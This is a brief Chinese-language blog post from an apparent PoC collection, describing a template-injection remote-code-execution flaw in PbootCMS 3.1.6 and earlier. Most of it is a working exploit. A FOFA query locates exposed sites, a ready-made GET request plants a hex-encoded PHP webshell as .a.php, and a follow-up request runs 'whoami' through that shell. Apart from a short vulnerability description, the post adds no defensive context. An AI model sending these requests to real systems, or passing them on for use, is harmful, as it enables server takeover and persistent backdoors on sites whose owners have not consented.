Pages

Menu

Babing
Published on 2024-08-30 / 7 Visits
0
0

P7-1Pboot-CMS-RCE

#Pocs

P7-1Pboot-CMS-RCE

漏洞描述:

PbootCMS v<=3.1.6版本中存在模板注入,攻击者可构造特定的链接利用该漏洞,执行任意代码,写入后门,获取服务器权限,进而控制整个web服务器

网站图片:

image-20240625132720490

网络测绘:

fofa语法:

FOFA:app=“PbootCMS-PHP网站开发管理系统”

漏洞复现:

payload:

GET /?member/login/aaaaaa}{pboot:if(true);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/test1;use/**/function/**/get/**/as/**/test3;use/**/function/**/hex2bin/**/as/**/test4;test(test1(test3('file'),'w'),test4(test3('content')));if(true)}{/pboot:if}&file=.a.php&content=3c3f7068702073797374656d28245f524551554553545b2761275d293b3f3e HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

效果图:
PS:PoC中content字段处写入的是十六进制编码的马子
image-20240619151320637
RCE

GET /.a.php?a=whoami HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

image-20240619151326163

P8-1Pentaho-业务分析平...
P6-2PandoraFMS-监控...

Comment